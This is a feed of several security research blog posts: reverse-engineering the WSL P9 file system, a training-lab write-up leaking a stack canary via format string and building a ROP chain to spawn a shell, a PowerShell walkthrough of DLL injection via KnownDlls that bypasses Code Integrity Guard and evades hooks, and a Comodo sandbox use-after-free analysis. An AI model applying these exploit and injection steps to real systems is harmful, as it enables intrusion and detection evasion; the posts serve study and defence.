Normal view

There are new articles available, click to refresh the page.
Before yesterdayWindows Exploitation

Digging into the WSL P9 File System

By: Unknown
12 July 2019 at 15:23
Windows 10 version 1903 is upon us, which gives me a good reason to go looking at what new features have been added I can find bugs in. As it's clear people seem to appreciate fluff rather than in-depth technical analysis I thought I'd provide a overview of my process I undertook to look at one new feature, the P9 file system added for the Windows Subsystem for Linux (WSL). The aim is to show my approach to analyzing a feature with the minimum amount of reverse engineering, ideally with no disassembly.

Background

When WSL was first introduced it had a pretty poor story for interoperability between the Linux instance and the host Windows environment. In the early versions the only, officially supported, way to interop was through DrvFS which allows you to mount local Windows drives into the Linux environment. This story has changed over time such as adding support to start Windows executables from Linux and better NTFS case-sensitivity support (which I blogged about already).

But one fairly large pain point remained, accessing Linux files from Windows applications. You could do it, the files are stored inside the distro's package directory (%LOCALAPPDATA%\Packages\DISTRO\LocalState\rootfs), so you could open them directly. However WSL relies on various tricks to deal with the mismatch between Windows and Unix-style filesystem semantics, such as storing the UID/GID and file permission bits in extended attributes. Modifying these files using an unenlightened Windows application could result in corruption of the file state which in the worse case could break the distro.

With the release of 1903 the WSL team (if such a thing exists) looks to be trying to solve this problem once and for all. This blog introduced the new feature, accessing Linux files via a UNC path. I felt this warranted at least a small amount of investigation to see how it works and whether there's any quick wins or low-hanging fruit.

Understanding the Feature

The first thing I needed was to setup a x64 version of 1903 in a Hyper-V VM. I then made the following changes, which I would always do regardless of what I end up using the VM for:
  • Disabled SecureBoot for the VM.
  • Enabled kernel debugging through BCDEDIT. Note that I tend to be paranoid enough to disable NICs in the VM (and my success of setting up alternative debug transports is mixed) so I resort to serial debugging over a named pipe. Note that for Gen 2 Hyper-V VMs you can't add a serial port from the UI, instead you need use the Set-VMComPort PowerShell cmdlet.
  • Install my tooling, such as NtObjectManager and SysInternals suite, especially Process Monitor.
  • Enabled the Windows Subsystem for Linux feature.
  • Install a distro of choice from the Windows Store. Debian is the most lightweight, but any will do for our purposes. Note that you don't need to login to the Store to get the distro, though the app will do its best to convince you otherwise. Don't listen to its lies.
With a VM in hand we can now start the investigation. The first thing I do is take any official information at face value and use that to narrow the scope. For example reading the official blog post I could determine the following:
  • The feature uses the Plan 9 Filesystem Protocol to access files.
  • The files are accessed via the UNC path \\WSL$\DISTRO but only when the distro is running.
  • The P9 server is hosted in the init process when the distro starts.
  • The P9 server uses UNIX sockets for communication.
Based on those observations the first thing I want to do is try and find how the UNC path is implemented. The rationale for starting at the UNC path is simple, that's the only externally observable feature described in the blog post. Everything else, such as the use of P9 or UNIX sockets could be incorrect. I'm not expecting the blog post to outright lie about the implementation, but there's sometimes more important details to get right than others. It's worth noting here that you should increase your skepticism of a feature's technical description the older the blog post is as things can and will change.

If we can find how the UNC path is implemented that should also lead us to whether P9 is used as well as what transport the feature is using. An important question is whether these files are really accessed via the UNC path, which would imply kernel support, or is it only in Explorer? This is important to allow us to track down where the implementation lies. For example it's possible that if the feature only works in Explorer it could be implemented as a shell extension, similar to how MTP/PTP is supported.

To determine whether its a kernel driver or a shell extension it's as simple as opening the UNC path using the lowest possible function, which in this case means calling a system call. Invoking a system call will also eliminate the chance the WSL UNC path is implemented using some new feature added to the Win32 APIs. As my NtObjectManager module directly calls the NtOpenFile system call we can use that to do the test. I ran the following PowerShell command to check on the result:

$f = Get-NtFile \??\UNC\wsl$\Debian\bin\bash

This command successfully opens the BASH executable file. This is a clear indication that we now need to look at the kernel to find the driver responsible for implementing the UNC path. This is commonly implemented by writing a Network Mini-Redirector which handles a lot of the setup with the Multiple UNC Provider (MUP) and the IO Manager.

At this point the assumption would be the mini-redirector would be implemented in the LXCORE system driver which implements the rest of WSL. However a quick check of the imports with the DUMPBIN tool, shows the driver doesn't import anything from RDBSS which would be crucial for the implementation of a mini-redirector. 

To find the actual driver name I'll go for the simplest, brute force approach, just list all drivers which import RDBSS and see if any are obvious candidates based on name. You could achieve this in one of many ways, for example you could implement a PE file parser and check the imports, you could script DUMPBIN, or you could just GREP (well FINDSTR) for RSBSS, which is what I'll do. I ran the following:

c:\> findstr /I /M rdbss c:\windows\system32\drivers\*.sys
c:\windows\system32\drivers\csc.sys
c:\windows\system32\drivers\mrxdav.sys
c:\windows\system32\drivers\mrxsmb.sys
c:\windows\system32\drivers\mrxsmb20.sys
c:\windows\system32\drivers\p9rdr.sys
c:\windows\system32\drivers\rdbss.sys
c:\windows\system32\drivers\rdpdr.sys

In the FINDSTR command I just list all drivers which contain the case insensitive string RDBSS and print out the filename only (unless you enjoy terminal beeps). The result of this process is a clear candidate P9RDR. This also likely confirms the use of the P9 protocol, though of course we should never jump the gun on this. 

We could throw the driver into a disassembler at this point and start RE, but I don't want to go there just yet. Instead, in the spirit of laziness I'll throw the driver into STRINGS and get out all printable debug string information, of which there's likely to be some. I typically use the SysInternals STRINGS rather than the BINUTILS one, just as I usually always have it installed on any test system and it handles Unicode and ANSI strings with no additional argument. Below is some of the output from the tool:

c:\> strings c:\Windows\system32\drivers\p9rdr.sys
...
\Device\P9Rdr
P9: Invalid buffer for P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid AF_UNIX path in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_REMOVE_CONNECTION_TARGET_INPUT.
...
\wsl$

We can see a few things here, firstly we can see the WSL$ prefix, this is a good indication that we're in the right place. Second we can see a device name which gives us a good indication that there's expected to be communication from user-mode to kernel mode to configure the device. And finally we can see the string "AF_UNIX" which ties in nicely with our expectation that Unix Sockets are being used.

One this which is missing from the STRINGS output is any indication of the Unix socket file name being used. Unix sockets can be used in an "abstract" fashion, however typically you access the socket through a file path on disk. It's most likely that a file is how the driver and communicates with the socket (I don't even know if Windows supports the "abstract" socket names). Therefore if it is indeed using a file it's not a fixed filename. The kernel has support for a socket library so again maybe this would be the place we could go disassembling, but instead we'll just do some dynamic analysis using PROCMON.

In order to open a socket from a file there must be some attempt to call the IO Manager to open it, this in turn would likely be detectable using PROCMON's filter driver. We can therefore make the following assumptions:

  • The file open can be detected in PROCMON.
  • The socket file will be opened in the context of the first process to open the UNC path.
  • The open request will have the P9RDR driver on the call stack.
The first assumption is a general problem with PROCMON. There are ways of opening files, such as inside another filter driver which cannot be detected by PROCMON as it never receives the request. However we'll assume that is can be detected, of course if we don't find it we might have to resort to disassembly or kernel debugging after all. 

The second assumption is based on the fact the WSL distribution isn't always running, therefore any Unix socket file would only be opened on demand, and for reasons of laziness is likely to be in the same process that first makes the request. It could push the request to a background thread, but it seems unlikely. By making this assumption we can filter PROCMON to only show open file requests from a known process.

The final assumption is there to filter down all possible open file requests to the ones we care about. As the driver is a mini-redirector the call chain is likely to be IO Manager to MUP to RDBSS to P9RDR to UNIX SOCKET. Therefore we only care about anything which goes through the driver of interest. This assumption is more important if assumption 2 is false as it might mean that we couldn't filter to a specific process, but we'll go with it anyway on the basis that it's useful technique to learn.

Based on the assumptions we can set PROCMON's filters for a specific process (we'll use PowerShell again) and filter for all CreateFile operations. The Windows kernel doesn't specifically differentiate between open and create calls (open is a specific case of create) so PROCMON doesn't either.

PROCMON Filter View showing filtering on powershell process name and CreateFile operation.

What about the call stack? As far as I can tell you can't filter on the call stack directly, instead we'll do something else. But first gather a trace of a PowerShell session where you execute the Get-NtFile command show earlier in this blog post. Now we want to save the trace as an XML file. Why an XML file? First, the XML format is easy to access, unlike the native PML format. However, the real answer is shown in the following screenshot.

PROCMON Save Dialog showing options for XML output including stack traces.

The screenshot shows the options for exporting to XML. It allows us to save the call stacks for all trace events. It will even resolve symbols, however as we're only interested in the module on the stack not the name we can select to include the stack trace, but not symbol resolving. With an exported trace we can now filter the calls based using a simple XPath expression. The following is a simple PowerShell script to run the XPath query.

$xml = [xml]$(Get-Content "LogFile.XML")
$xml.SelectNodes("//event[stack/frame[contains(path, 'p9rdr')]]/Path[text()]")

The script is pretty simple, if you "cast" a text file to an XML object (using [xml]) PowerShell will create an XML DOM Document from the text. With the Document object we can now call SelectNodes with an appropriate XPath. In this case we just want to select all Path of all events which have a stack trace frame containing the P9RDR module. Running this script against the capture results in one hit:

%LOCALAPPDATA%\Packages\DISTRO\LocalState\fsserver

DISTRO is the name of the Store package you installed the distro from, for example Debian is installed into TheDebianProject.DebianGNULinux_76v4gfsz19hv4. With a file name of fsserver it seems pretty clear what the file is for, but just to check lets open the event back in PROCMON and look at the call stack.

PROCMON call stack opening fsserver showing AFUNIX driver and P9RDR.

I've highlighted areas of interest, at the top there's the calls through the AFUNIX driver, which demonstrates that the file is being opened due a UNIX socket connection being made. At the bottom we can see a list of calls in the P9RDR driver. As symbol resolving is enabled we can use the symbol information to target specific areas of the driver for reverse engineering. Also now we know the path we can put this back into PROCMON as a filter and from that we can confirm that it's the init process which is responsible for setting up the file server.

In conclusion we can at least confirm a few things which we didn't know before.
  • The handling of the UNC paths is handled entirely in kernel mode via a mini-redirector. This makes the file system more interesting from a security perspective as it's parsing arbitrary user data in the kernel.
  • The file system uses UNIX sockets for communication, this is handled by the kernel driver and the main init process.
  • The socket protocol is presumably P9 based on the driver name, however we've not actually confirmed that to be true.
There's of course still things we'd want to know:
  • How is the UNC mappings configured? Via the device driver?
  • Is the protocol actually P9, if so what information is being passed across?
  • How well "fuzzed" are the protocol parsers.
  • Does this file system have any other interesting behaviors.
Some of those things will have to wait for another blog post.









Stack-canary (ROP), format string leak plus how I learned that nullbyte is not a badchar to scanf("%s",buf) - while socat ignores read on STDIN - MBE LAB8A

28 July 2019 at 14:28

This time we are having some fun with a standard null-armored stack canary, as well as  an additional custom one (we will extensively cover both scenarios, as there's plenty of subject matter here), plus some peculiarities regarding scanf() and read().

The relevant MBE lecture can be found here http://security.cs.rpi.edu/courses/binexp-spring2015/lectures/19/11_lecture.pdf (the last section covers stack canary implementations and possible bypasses, as well as resources on deeper research).

A look at the target app, its vulns and its custom stack cookie protection

As usual, the target app can be found here - https://github.com/RPISEC/MBE/blob/master/src/lab08/lab8A.c.

Here are the compilation flags; static and no PIE - although the latter does not matter much in this case - we will leak the code segment base anyway:

Let's start with the main function:

We have two always functions called from the main function one after another, regardless to any user input; selectABook() and findSomeWords().

selectABook() looks like this:

Apart from its (and the entire app's, for that matter) general weirdness, we can see that:

  1. the function is recurrent (line 29) when user input does not match any of the hardcoded conditions
  2. it's vulnerable to a stack-based buffer overflow via scanf("%s",buf_secure) - line 16
  3. it's also vulnerable to format string (line 17)

readA(), readB() and readC() are just simple methods printing out static hardcoded strings (Aristote's Metaphysics quotes), nothing useful in the context of exploitation (unless we had printf() GOT overwritten, but that is not what's going to happen here):

So at this point it already looked like I had what was needed to pwn the app; two bugs to chain together:

  • an overflow to overwrite the saved RET on the stack
  • a format string to leak the value of stack canary (and stack and code base if neessary) - so we can overwrite the stack canary with its own original value and therefore avoid the stack guard noticing we smashed the stack and therefore avoid the stack guard preventing the program from returning to our arbitrary EIP

Leaking the standard canary with format string

Let's start with identifying how the actual built-in code for handling stack canaries looks like in gcc-produced assembly:

the beginning of the main() function
the bottom of the main() function

The same holds true for all other functions.

Now, let's see what the stack values look like between runs and how exactly stuff is aligned on the stack. As we want to leak from selectABook()'s stack - because this is where the format string resides - let's put our breakpoints there:

Let's stop at selectABook+15 - our current canary will be held in EAX.

Then at selectABook+42 - after the scanf() call - we'll fill the buf[512] with exactly 512 bytes so we don't overflow anything yet and see the original values on the stack.

So we run:

breakpoint 1 - canary value is held in EAX

OK, now let's continue. Now (we have already been prompted above - Enter Your Favorite Author's Last Name:), we just paste 512 characters:

OK, we're past the scanf() call. Let's see the stack now:

... snip ...

The format string we are exploiting is simple printf(buf_secure). buf_secure[512] is 512 bytes-long. If we apply abuser friendly format string %p (so the whole dword of choice is printed, as hex) - just like we did here https://hackingiscool.pl/heap-overflow-with-stack-pivoting-format-string-leaking-first-stage-rop-ing-to-shellcode-after-making-it-executable-on-the-heap-on-a-statically-linked-binary-mbe-lab7a/) - considering that 512/4 = 128, we would expect our canary at %129$p.

Nah, something's wrong. Maybe it's because string formats index the`$`-referred arguments starting at 1... Let's see what's under %1$p:

Nah, it's the buf_secure address itself.

How about 130?

Yeah more like it.

The value is consistent between function calls (selectABook() as well as selectABook()->selectABook() recurrent call - remember, the stack canary value is global to the entire process) and it changes between runs.

Also, in this case the saved EBP should be right next to it, at 131:

Consecutive values of saved EBP across recurrent selectABook() calls

Yup. The consecutive values are decreasing by a fixed offset, as recurrent calls of selectABook() continue.

We will need this value as well while developing the exploit for this.

As a matter of fact at this point I even wrote the first version of the exploit (https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8A/wannabe_initial_exploit.py).

As usual - the exploit failed at the first attempt...

And I was too lazy to actually debug it.

Instead, once I noticed that the saved RET was not overwritten in result of overflowing the buffer, I mistakenly assumed (self-limiting assumptions!) that the nullbyte-armoured stack canary (you probably already noticed that all the canaries so far had nullbyte as their least-significant byte) was the reason I could not - via scanf("%s",buf_secure) - write beyond the nullbyte. I just thought scanf() would stop reading after encountering 0x0 on its input, explicitly because of the %s format string. I was wrong, but this assumption was reinforced by the fact that oftentimes while figuring out solutions to MBE targets I felt like it was all fine and dandy... only to later realize some tiny little obstacle. A tiny little obstacle forcing me to double the overall effort to attain a working exploit. Thus I assumed selectABook() exploitability was too good (too easy) to be true.

To follow the selectABook() exploitation route, skip to Building the ROP chain and then to Successfully exploiting selectABook() locally and remotely sections.

Otherwise, read on to explore the remainder of the target app and my exploit dev process.

Analyzing the rest of the code

We have only read half of the source code yet (as mentioned, this is an extensive write up)!

So, to feed our curiosity, instead of getting ahead of ourselves, let's see what's going on in the second function - findSomeWords():

The stack-based buffer overflow of the 24-byte buf[24] buffer with read(STDIN, buf,2048) at line 75 is quite blatant.

The rest of the code is just super-weird. First, the unused char lolz[4], then the entire custom cookie mechanism.

Bypassing the custom canary check

So let's try to figure out what's the deal with it.

global_addr and global_addr_check are global pointers held in the data segment, declared at the top of the source code, right below the compilation flags comment:

Although their initialization expressions are quite simple, I found them far away from obvious:

So apparently global_addr is a pointer to the next value after the buf (I initially thought it's just the address of the buf buffer incremented by 1, but I was wrong).

Then global_addr_check is the global_addr (whatever it is) decremented by 2.

And then finally there's this check:

The implication is as follows: if we want to exploit the stack-based buffer overflow in findSomeWords(), we need the function to properly return, without the exit(EXIT_FAILURE) nor the standard stack guard interrupting.

So in order to make it return, we need to both:

  • overwrite the original stack canary stored on the stack with its own value that we leak earlier via format string in selectABook() (there is just one stack canary value for the entire program, initiated before main() is executed, used by the stack guard for all following function calls)
  • make the ((( globaladdr))^((globaladdrcheck))) != ((( globaladdr))^(0xdeadbeef)) condition return false so exit(EXITFAILURE) is not called

Let's simplify the custom-cookie condition.

We want this:

to evaluate false.

Which means we want this to be true:

Which means global_addr_check must equal 0xdeadbeef.

OK fair enough, does this mean that the custom cookie protection by default makes the program exit with EXIT_FAILURE error code and Whoah there! message?

Yes, it does - simply running the app and providing "A" and "HELLO" inputs, respectively, results in this:

Fair enough. Let's bypass this custom canary, forgetting about the format string and overflows for now.

Let's make this app print out Whew you made it! instead of doing exit(EXIT_FAILURE) in findSomeWords():

As my poor understanding of C kept me unsure about the mechanism, I got to the bottom of this by running gdb, disassebmling the findSomeWords()function, setting up a breakpoint after the read() call and stepping through it, instruction after instruction.

OK, breapoints:

Debugging step by step.

1)  findSomeWords+80:

At this point EAX is 0xbffff700 --> 0xc43c9300  - the address of the canary on the local function's stack.

2) findSomeWords+87:

At this point EAX is still 0xbffff700 --> 0xc43c9300, EDX is 0xc43c9300 (canary from the stack). So now we have proof that the global_addr = (&buf+0x1); instruction makes the global_addr pointer point at the canary on the stack.

And now we are about to find out what's under ds:0x80edf24 (the value just gets copied to EAX).

3) findSomeWords+92:

And now EAX is 0x080481a8... weird. Let's peek the stack and see what's what:

OK, so global_addr points at the canary on the stack, while global_addr_check points at the value two dwords (-0x8) earlier. But hang on, where did this 0x080481a8 value come from?

The reason is that we did not fill the entire buf[24] buffer (I only sent 11 Bs at that time). Here's how the buf[24] overlaps with global_addr_check:

This means that:

global_addr points at the stack-stored copy of the canary

global_addr_check points at the before-last byte of the buf[24]. So the (&buf+0x1); instruction considered the buf size, making it point at the next dword on the stack (the canary), while global_addr_check = global_addr-0x2; made global_addr_check points two dwords earlier, at the four bytes at buf[15-19].

In recap: the stack-stored canary XOR-ed with 0xdeadbeef must equal stack-stored canary XOR-ed with the before-last dword of the buff. Which simply means we just want the before-last dword of buff[24] (again, bytes 15-19) to be 0xdeadbeef.

So as long as the value we provide to the read(STDIN,buf,2048) call in findSomeWords() contains 0xdeadbeef at its fifth dword (bytes 15-19), we should bypass the custom stack protection:

https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8A/custom_canary_bypass.py

Yup, that's exactly it:

OK cool, now we should be able to easily exploit the overflow in findSomeWords().

Building the ROP chain

Since we don't have libc dynamically linked in here, we can't do system().

Fine, we just want to call execve syscall the usual way:

eax = 0xb

ebx = pointer to "/bin/sh" - or, for that matter, "/bin/python" or anything other than "/bin/bash" (because bash is evil and drops the euid if called from a suid binary - fucking safety features)

ecx = edx = 0

int 0x80

Let's start ROPeme ropshell.py, generate the gadgets from the target binary and search through them.

Spoiler alert: at the late stage of the exploit development process I realized that - when targeting the scanf("%s") overflow - characters 0xa (newline) and 0xd (carriage-return) have to be avoided - as opposed to 0x0 (yes, really).

Thus, some of the gadgets I initially used had to be replaced due to the fact their addresses contained either 0xa or 0xd.

Running ROPeme, generating the gadgets:

Loading the gadgets:

Searching the gadgets (let's start with xor anything anything):

OK, all the last three look good for starters, we can initiate EAX with 0.

By the way, please keep in mind I started building this one with the assumption I could not use nullbytes in the payload, so instead of just putting a pop eax address followed by a nullbyte, I kept assembling these workarounds - but it was fun and finally worked.

So - as there was no xor edx edx (effectively EDX=0) gadget, I followed one of the tips found here (https://trustfoundry.net/basic-rop-techniques-and-tricks/) to use xchg instead (as we have already put 0 to EAX):

Just keep in mind now EAX hold whatever garbage was in EDX, so we'll have to zero it again, with one of the xor eax eax gadgets.

Oh fuck, we can't use them. They all contain 0xa.

Fair enough.

Instead, we use the gadget putting 0xffffffff to EDX followed by inc edx to overflow it to 0:

Now, we want EAX to become 0xb. It's 0 at the moment.

So why not to call inc eax twelve times.

My meticulous effort to keep the chain clean from nullbytes finally collapsed when I had to nullify ecx. Instead of pop ecx followed by a nullbyte I did this:

Which looks nicer but still does not change the fact that p32(0x1) = 0x00000001 - contains three nullbytes.

Then, EBX = address of "/bin/sh" (we will smuggle /bin/sh string to the stack in user input, then just calculate its address based on the leaked EBP value):

OK, one last thing, the int 0x80 call.

But wait, it has a nullbyte (I did not want nullbytes!).

OK, so what's the instruction right above it?

It's a NOP. Wonderful. So we can as well use 0x806f8ff.

Successfully exploiting findSomeWords() locally - read(STDIN,buf,2048) not catching up via socat

Having all the bits and pieces I assembled an exploit targeting the findSomeWords() overflow, with the following algorithm:

1) leak the canary and the saved RET via format string

2) make the selectABook() function return by providing one of the expected values ("A") to its input

3) overflow the buf[24] buffer via read(STDIN, buf, 2048), using the leaked canary as well as the 0xdeadbeef constant properly aligned in the payload, followed by four bytes of garbage to fill the saved EBP and the ROP chain beginning where saved RET was:

https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8A/exploit_works_only_locally.py

And it worked just fine on the target binary /levels/lab08/lab8A, getting me a shell... The problem was that my privileges were still lab8A instead of expected lab8end... So I listed the /levels/lab08 directory only to find out that this one is NOT a suid binary.

Instead I found this:

This means the target is being run from root like this:

socat TCP-LISTEN:8841,reuseaddr,fork,su=lab8end EXEC:timeout 60 /levels/lab08/lab8A

"Well that's just as well" - I thought. And just changed the p = process(binary.path,stdin=PTY) line to p = remote("127.0.0.1", 8841) and ran the thing.

It did not work.

Debugging (this time attaching to the target PID from root, as there was no other way) revealed that the exactly same exploit code did not deliver a single byte to the buf[24] buffer.

So I thought "how come, ffs... Does it mean it completely ignores the user input?".

So I ran it manually to see that was the case:

Interacting with the socat-run target app via nc

So yes, I could only interact with the selectABook() function. Simply typed "A" and pressed enter, having no further opportunity to interact with the application.

At the moment I still do not know why - please let me know if you have a clue, I am curious.

Successfully exploiting selectABook() locally and remotely

At this point, as usual when I felt despair - I peeked into Corb3nik's solutions (https://github.com/Corb3nik/MBE-Solutions/blob/master/lab8a/solution.py) - not only to see that his exploit did not deal with findSomeWords() and its custom stack canary at all - but mostly to realize he exploited selectABook() (which meant scanf("%s") ... with nullbytes in the payload!

So I fell back on the first exploit I wrote, started debugging it again. I found out the reason it was failing was due 0xa and 0xd characters in the initial ROP chain. These turned out to be the real bad characters when it comes to scanf()! Again, as opposed to nullbyte.

Then I found out that the string I was trying to make EBX point to (/bin/python) - as I found that string on the stack in the early stage of the exploit development and thought it would be nice to use it instead of delivering /bin/sh via user input) - was not there when targeting the actual app running under socat... It must have been a side effect of spawning the process from the python script with pwntools while developing the exploit.

Then it turned out my lengthy ROP chain (overflowing the local buf_secure of the  selectABook()->selectABook() call ) overwrote the /bin/sh value I delivered to the stack right after the initial format-string payload (the first call of selectABook()).

So I ended up adding additional 200 characters (H) between the format string and /bin/sh and increasing the value subtracted from the leaked EBP in the binsh_addr =EBP_value-338 expression accordingly.

1) Attacking the first selectABook() call to leak the canary and the saved EBP via format string while also stuffing /bin/sh on the stack - with 200 H-s between as this buffer will get overwritten by the ROP chain when we overflow the buffer in the second (recurrent) call selectABook()->selectABook():

2) Attacking the second call selectABook()->selectABook() by overflowing the buf_secure[512] with 512 B-s followed by the original leaked canary value, the original saved EBP value (although this value does not matter here as long as it is not a bad char) and the 0xa-free and 0xd-free ROP chain replacing the saved RET:

3) Making the third selectABook()->selectABook()->selectABook() call return (instead of continuing the recurrence) by providing one of the expected values - A:

Getting the flag

The final code can be found here:

https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8A/exploit_working.py

Windows Code Injection: Bypassing CIG Through KnownDlls

By: tiraniddo
11 August 2019 at 00:20
TL;DR; This blog post describes a technique to inject a DLL into a process using only Duplicate Handle process access (caveats apply) which will also bypass Code Integrity Guard.

I've been attending Blackhat USA 2019 and watched a presentation by Amit Klein and Itzik Kotler on Windows Process Injection techniques. While I didn't learn anything new from the presentation that you couldn't from just reading Hexacorn's blog it was interesting to see them document what techniques worked against Code Integrity Guard (CIG) and what did not. CIG if you don't know, is Microsoft's term for blocking non-MS signed DLLs from being loaded into a process. If CIG is enabled on a process then you can load an arbitrary DLL not signed by Microsoft, instead you'll have to do some sort of shellcode or ROP.

During the presentation I was waiting for the punchline of a technique which bypasses CIG to load an arbitrary DLL, but it never arrived. I'm guessing the researchers don't bother to read my blog posts *sigh*, such as this one on injecting code into a Protected Processes though abusing the KnownDll mechanism. This would also work to bypass CIG if injecting from an external process not under CIG (or Device Guard). All the ways of hijacking the Known DLL loader that I've documented rely on knowing the location of Known DLL handle in NTDLL's data section. That's useful when you have little control over the target process and only an arbitrary read/write primitive. For user-mode code injection you're likely to be able to do anything to the process.

Writing a new handle value does have draw backs if you're thinking about it from a generic code injection perspective. Firstly the location of the handle can (and does) change depending on the version of NTDLL and secondly if you access and write memory of another process you might as well call your binary malware.exe. Of course writing to memory is not the only way to hijack Known DLLs, you can achieve the same thing with only Duplicate Handle access on the process, which is probably slightly less suspicious.

How can we do this without modifying the handle value? There's 3 key observations we can make that only require Duplicate Handle access:
  1. We can find the existing handle value of the KnownDlls directory by duplicating handles from a process to another and querying for the name.
  2. We can close a handle in another process by specifying DUPLICATE_CLOSE_SOURCE to DuplicateHandle.
  3. The kernel's handle allocator will reuse the handle values so we can replace the original handle with a different object through brute force.
Let's go through how this works in practice. I'm going to show some snippets of PowerShell which use my NtObjectManager module. I'm not going to provide a full end-to-end proof-of-concept however for various reasons.

Step 1: Bring up a process to inject into, the Known DLLs handle is created during the initial loader process before the process entry point is called, so the process must run at least that long. Once we know the Process ID of the process to inject into we can dump all handles in the process and look for anything with the NT type of Directory. Each directory handle can then be duplicated into the current process and inspected. If the name of the directory is "\KnownDlls" we've found our target. In PowerShell we can use my Get-NtHandle cmdlet to dump the handle table, this doesn't require opening the process itself. To get the name we only need PROCESS_DUP_HANDLE access to the target. Here's a basic PS function to get the handle value:

$id = $(Get-Process notepad).Id
$hs = Get-NtHandle -ProcessId $id -ObjectTypes Directory
foreach($h in $hs) {
  if ($h.Name -eq '\KnownDlls') {
    $handle = $h.Handle
    break
  }
}

Step 2: Create an empty object directory and insert into it a named image section object. The name of the section needs to match the name of the system32 DLL we want to hijack. The file backing the section is obviously the DLL you want loaded into the process. Again some code, assuming you've already created the directory 

$dir = New-NtDirectory
$sect = Use-NtObject($f = Get-NtFile -Path "\??\c:\dir\fake.dll") {
        New-NtSection -File $f -SectionAttributes Image `
          -Root $dir -Path "blah.dll" -Protection Execute
    }
}

Step 3: Close the original Known DLLs handle. Again this only needs Duplicate Handle access. At this point you probably also want to suspend the process to ensure something doesn't execute and allocate the handle over the top of your now closed handle. Of course if you suspend the process you'll need a bit more access.

$proc = Get-NtProcess -ProcessId $id -Access DupHandle
Copy-NtObject -SourceHandle $handle -SourceProcess $proc `
                                    -CloseSource

Step 4: Repeatedly duplicate the fake Known DLLs directory you created in step 2 until you get the same handle value as you identified in step 1. If the process is suspended this shouldn't take more than a few tries at worst.

$i = 0
while($i -lt 1000) {
   $h = Copy-NtObject -DestinationProcess $proc -Object $dir
   if ($h -eq $Handle) {
       break
   }
   $i++
}

Step 5: Everything is now setup. The final step is you'll need to get a new library loaded from system32 inside the process. There's a number of possible techniques for this. You could go old-skool and create a new thread in process calling LoadLibrary. Or you could identify a DLL which you know the process will load in response to a UI or RPC action. For example opening a file in Notepad will spawn the explorer open dialog which pulls in ALOT of new DLLs. Be creative, at least if you don't want to open the process with anything above Duplicate Handle access.


The question you might be asking is, "Do any AV/Host Detection tools catch this trick?". Honestly I don't know, nor do I care. However it has some things going for it:

  • It doesn't requiring reading or writing memory from the target process.
  • Inline hooks on LoadLibrary/LdrLoadDll will just see loading a system32 DLL unless they also then query for the mapped file name after the operation has completed.
  • It bypasses CIG, so anyone thinking that'll prevent injection will be surprised.
You could probably make it even more convert, but I'm not going to do so. As I've noted before I'm also not going to write a proof-of-concept or write a tool to do this, you can do it yourself.












Comodo Antivirus - Sandbox Race Condition Use-After-Free (CVE-2019-14694)

13 August 2019 at 16:14
Hello,
In this blogpost I'm going to share an analysis of a recent finding in yet another Antivirus, this time in Comodo AV. After reading this awesome research by Tenable, I decided to give it a look myself and play a bit with the sandbox.

I ended up finding a vulnerability by accident in the kernel-mode part of the sandbox implemented in the minifilter driver cmdguard.sys. Although the impact is just a BSOD (Blue Screen of Death), I have found the vulnerability quite interesting and worthy of a write-up.

Comodo's sandbox filters file I/O allowing contained processes to read from the volume normally but redirects all writes to '\VTRoot\HarddiskVolume#\' located at the root of the volume on which Windows is installed.

For each file or directory opened (IRP_MJ_CREATE) by a contained process, the preoperation callback allocates an internal structure where multiple fields are initialized.

The callbacks for the minifilter's data queue, a cancel-safe IRP queue, are initialized at offset 0x140 of the structure as the disassembly below shows. In addition, the queue list head is initialized at offset 0x1C0, and the first QWORD of the same struct is set to 0xB5C0B5C0B5C0B5C.


(Figure 1)

Next, a stream handle context is set for the file object and a pointer to the previously discussed internal structure is stored at offset 0x28 of the context.
Keep in mind that a stream handle context is unique per file object (user-mode handle).

(Figure 2)

The only minifilter callback which queues IRPs to the data queue is present in the IRP_MJ_DIRECTORY_CONTROL preoperation callback for the minor function IRP_MN_NOTIFY_CHANGE_DIRECTORY.

Before the IRP_MJ_DIRECTORY_CONTROL checks the minor function, it first verifies whether a stream handle context is available and whether a data queue is already present within. It checks if the pointer at offset 0x28 is valid and whether the magic value 0xB5C0B5C0B5C0B5C is present.


(Figure 3) : Click to Zoom

Before the call to FltCbdqInsertIo, the stream handle context is retrieved and a non-paged pool allocation of size 0xE0 is made of which the pointer is stored in RDI as shown below.


(Figure 4)

Later on, this structure is stored inside the FilterContext array of the FLT_CALLBACK_DATA structure for this request and is passed as a context to the insert routine.

(Figure 5)

FltCbdqInsertIo will eventually call the InsertIoCallback (seen initialized on Figure 1). Examining this routine we see that it queues the callback data structure to the data queue and then invokes FltQueueDeferredIoWorkItem to insert a work item that will be dispatched in a system thread later on.

As you can see from the disassembly below, the work item's dispatch routine (DeferredWorkItemRoutine) receives the newly allocated non-paged memory (Figure 4) as a context.

(Figure 6) : Click To Zoom
Here is a quick recap of what we saw until now :
  • For every file/directory open, a data queue is initialized and stored at offset 0x140 of an internal structure.
  • A context is allocated in which a pointer to the previous structure is stored at offset 0x28. This context is set as a stream handle context.
  • IRP_MJ_DIRECTORY_CONTROL checks if the minor function is IRP_MN_NOTIFY_CHANGE_DIRECTORY.
  • If that's the case, a non-paged pool allocation of size 0xE0 is made and initialized.
  • The allocation is stored inside the FLT_CALLBACK_DATA and is passed to FltCbdqInsertIo as a context.
  • FltCbdqInsertIo ends up calling the insert callback (InsertIoCallback) with the non-paged pool allocation as a context.
  • The insert callback inserts the request into the queue, queues a deferred work item with the same allocation as a context. 
It is very simple for a sandboxed user-mode process to make the minifilter take this code path, it only needs to call the API FindFirstChangeNotificationA on an arbitrary directory.

Let's carry on.

So, the work item's context (non-paged pool allocation made by IRP_MJ_DIRECTORY_CONTROL for the directory change notification request) must be freed somewhere, right ? This is accomplished by IRP_MJ_CLEANUP 's preoperation routine.

As you might already know, IRP_MJ_CLEANUP is sent when the last handle of a file object is closed, so the callback must perform the janitor's work at this stage.

In this instance, The stream handle context is retrieved similarly to what we saw earlier. Next, the queue is disabled so no new requests are queued, and then the queue cleanup is done by "DoCleanup".

(Figure 8)

